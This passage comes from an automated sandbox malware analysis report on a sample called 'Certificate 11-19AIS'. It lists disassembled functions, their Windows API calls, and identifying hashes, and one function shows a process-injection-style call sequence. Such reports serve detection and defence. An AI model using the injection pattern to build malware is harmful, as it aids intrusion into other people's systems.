                                                                                • Part of subcall function 007B5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00871148,?,007B61FF,?,00000000,00000001,00000000), ref: 007B5392
                                                                                • Part of subcall function 007B49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                                              • _wcscat.LIBCMT ref: 00822D80
                                                                              • _wcscat.LIBCMT ref: 00822DB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileModuleNameOpen
                                                                              • String ID: \$\Include\
                                                                              • API String ID: 3592542968-2640467822
                                                                              • Opcode ID: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                                              • Instruction ID: ab1e64950b6ff016ca8bbec05c50d4810e474525abd56c6035e853aec3066630
                                                                              • Opcode Fuzzy Hash: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                                              • Instruction Fuzzy Hash: 705150B1404344DBC314EF59E98999AB7F4FF59310B80452EF64CC3265EB38E688CB62
                                                                              Function 007D34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getstream.LIBCMT ref: 007D34FE
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 007D3539
                                                                              • __wopenfile.LIBCMT ref: 007D3549
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                              • String ID: <G
                                                                              • API String ID: 1820251861-2138716496
                                                                              • Opcode ID: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                                              • Instruction ID: 1627f278913da6bd827b49b07a067db5ce6a8dd9cad05db74d05635de6e417ad
                                                                              • Opcode Fuzzy Hash: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                                              • Instruction Fuzzy Hash: B411E370A00206DEDB52BF70AC4667E36B4AF45390B158527E81ADB381EA3CCA1197B2
                                                                              Function 007CD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007CD28B,SwapMouseButtons,00000004,?), ref: 007CD2BC
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2DD
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                                              • Instruction ID: a9058e6122e909c926a675cf10229c2ce33886bb932e14530140769c5f7222ac
                                                                              • Opcode Fuzzy Hash: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                                              • Instruction Fuzzy Hash: 91112375611218FFDB208FA8DC84EAE7BB8EF44744F10486DA805D7210E635EE419B60
                                                                              Function 00EF1978 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                              • Instruction ID: 88781ea6f4b1eaf21366f230d1160c5eb2a8fd9f6e533cd0deecc4c50aaad200
                                                                              • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                              • Instruction Fuzzy Hash: DF62FC30A146189BEB24CFA4C851BEEB376EF58304F1091A9D21DFB390E7759E81CB59
                                                                              Function 007B2322 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007B24F1), ref: 007B2303
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007B25A1
                                                                              • CoInitialize.OLE32(00000000), ref: 007B2618
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0082503A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID: HP
                                                                              • API String ID: 3815369404-295633388
                                                                              • Opcode ID: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                                              • Instruction ID: 6687b68e575914b1b1f70fe69f9698a87584f918326112bfc174de6b8b0745d6
                                                                              • Opcode Fuzzy Hash: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                                              • Instruction Fuzzy Hash: 7171BFB49213818ACF14DFAEA89D594BBA5F799344780416ED20DCBF7ADB38C484CF14
                                                                              Function 007FC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
                                                                              • _free.LIBCMT ref: 007FC4DD
                                                                              • _free.LIBCMT ref: 007FC4E4
                                                                              • _free.LIBCMT ref: 007FC54F
                                                                                • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                                                • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                                              • _free.LIBCMT ref: 007FC557
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction ID: ea03251bef7a40280b2b3a399201f25beacdbc1048542cc1494f95f28b3423dc
                                                                              • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction Fuzzy Hash: 53516BB1904218EFDB259F64DC85BEEBBB9EF48304F1000AEB25DA3341DB755A908F59
                                                                              Function 007CEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007CEBB2
                                                                                • Part of subcall function 007B51AF: _memset.LIBCMT ref: 007B522F
                                                                                • Part of subcall function 007B51AF: _wcscpy.LIBCMT ref: 007B5283
                                                                                • Part of subcall function 007B51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 007CEC07
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007CEC16
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00823C88
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              • Opcode ID: 865427fd685d652ccec3fd0d43df674d81f78e3a885e051c60b6917c150afe79
                                                                              • Instruction ID: 1deb9dea46012148fcbfe307e01f3003f72618f3d3edc6c0db6f1616c50ade6d
                                                                              • Opcode Fuzzy Hash: 865427fd685d652ccec3fd0d43df674d81f78e3a885e051c60b6917c150afe79
                                                                              • Instruction Fuzzy Hash: F721AA70504794AFE7329B28DC59FE7BBECEB45308F04044DE69E96141C3786AC48B51
                                                                              Function 007B40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00823725
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0082376F
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                                • Part of subcall function 007B40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: efdf7b948a009ad7d0e648abd022b68d03e67a24930c9cf3713eaf9dcf84b76d
                                                                              • Instruction ID: 41ed46a53c3a2099fdb95d302a253314d9264919701e74a9f2f9ccee32852f42
                                                                              • Opcode Fuzzy Hash: efdf7b948a009ad7d0e648abd022b68d03e67a24930c9cf3713eaf9dcf84b76d
                                                                              • Instruction Fuzzy Hash: 6F218471A10298ABCF019FD8D8497DE7BF9AF49304F00405AE505E7241DBB89A898F65
                                                                              Function 007FC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 007FC72F
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007FC746
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: 332b10de726cd7c875caa011fb3215a07b7d6d685f63d86d91549339eec05e2f
                                                                              • Instruction ID: 73e01a62b08f157e4f8b41b7068138b660ae7437f4f2c16ae550dd78927dbfcb
                                                                              • Opcode Fuzzy Hash: 332b10de726cd7c875caa011fb3215a07b7d6d685f63d86d91549339eec05e2f
                                                                              • Instruction Fuzzy Hash: B5D05E7250030EABDF10ABA0EC0EF8B7B6CA700704F0005A07650E51B1DAB4E6998B54
                                                                              Function 0080F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b819bae9668bcf613c6d1cdcfa5e9c13fc43d678bea597846133bceca762ad09
                                                                              • Instruction ID: 14e794c9c4cd7d60ab0605becf62408b9d7070f00181850417fa7a10ecafbe0d
                                                                              • Opcode Fuzzy Hash: b819bae9668bcf613c6d1cdcfa5e9c13fc43d678bea597846133bceca762ad09
                                                                              • Instruction Fuzzy Hash: DAF169716043059FC720DF28C895B6AB7E5FF88314F14892DFA959B292D734E945CF82
                                                                              Function 007B4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007B5022
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: ce9dcd0b203f62ca37922d86c2e8de3f072bb3bcd7ba067bfbcf5bdbc7fed9df
                                                                              • Instruction ID: 6b2c82e68a5e1f07273ec80dfbdec8d0cb5d6e2ea9bac2745a16e2be830d023b
                                                                              • Opcode Fuzzy Hash: ce9dcd0b203f62ca37922d86c2e8de3f072bb3bcd7ba067bfbcf5bdbc7fed9df
                                                                              • Instruction Fuzzy Hash: 6D314FB1504701CFD721EF38E8497DBBBE4FB49304F00092EE59E86251E775A984CBA6
                                                                              Function 007D395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81E9
                                                                                • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81F3
                                                                              • __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D821F: GetModuleFileNameW.KERNEL32(00000000,00870312,00000104,00000000,00000001,00000000), ref: 007D82B1
                                                                                • Part of subcall function 007D821F: ___crtMessageBoxW.LIBCMT ref: 007D835F
                                                                                • Part of subcall function 007D1145: ___crtCorExitProcess.LIBCMT ref: 007D114B
                                                                                • Part of subcall function 007D1145: ExitProcess.KERNEL32 ref: 007D1154
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 718a751250bd395f38f9208a77a495dac581836d288aac87095e38437def5743
                                                                              • Instruction ID: 79ea37c1d1503661a33aae19982724fe82de6e631b91c50a285b1c3a3b946a5a
                                                                              • Opcode Fuzzy Hash: 718a751250bd395f38f9208a77a495dac581836d288aac87095e38437def5743
                                                                              • Instruction Fuzzy Hash: BC019635245201EAE6553B34EC6AB2A737CAB81768B21012BF50996381DAFCED408672
                                                                              Function 007FC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007FC385,?,?,?,?,?,00000004), ref: 007FC6F2
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007FC708
                                                                              • CloseHandle.KERNEL32(00000000,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC70F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 9511d1f43ba41b39fc806afe4d10ccdc947b2c2fc455913fc3b852602f5ce3e0
                                                                              • Instruction ID: 79ed3c5cb731d2f15c32f2b8e2e7e29b23504e514fc1bd948ca92d92b093b182
                                                                              • Opcode Fuzzy Hash: 9511d1f43ba41b39fc806afe4d10ccdc947b2c2fc455913fc3b852602f5ce3e0
                                                                              • Instruction Fuzzy Hash: 63E08632140318B7D7212B54BC09FCE7B18BB45770F104510FB156A1E097B129119798
                                                                              Function 007FBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 007FBB72
                                                                                • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                                                • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                                              • _free.LIBCMT ref: 007FBB83
                                                                              • _free.LIBCMT ref: 007FBB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction ID: 853ff41138141d13ccd477943c8cdcd45c3857c3f18c4aee212c72ae7fb37433
                                                                              • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction Fuzzy Hash: 7EE0C2E121070192CA206538EE48EB313DC0F04312714080EB51DE3342EF2CE84084B4
                                                                              Function 00810828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strcat.LIBCMT ref: 008108FD
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • _wcscpy.LIBCMT ref: 0081098C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1012013722-0
                                                                              • Opcode ID: ad169748d04487747fff71742d3b39a266f3cecff24502aa3d6fb532467c1636
                                                                              • Instruction ID: 7284c4485e1d9505de06f3fe2771e5179040b16f85720dff910a3c42b8b9475d
                                                                              • Opcode Fuzzy Hash: ad169748d04487747fff71742d3b39a266f3cecff24502aa3d6fb532467c1636
                                                                              • Instruction Fuzzy Hash: 2A914B34A00614DFCB18DF18C995AA9B7E9FF49314B55806AE81ACF392DB74ED81CF80
                                                                              Function 007B3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 007B3A73
                                                                                • Part of subcall function 007D1405: __lock.LIBCMT ref: 007D140B
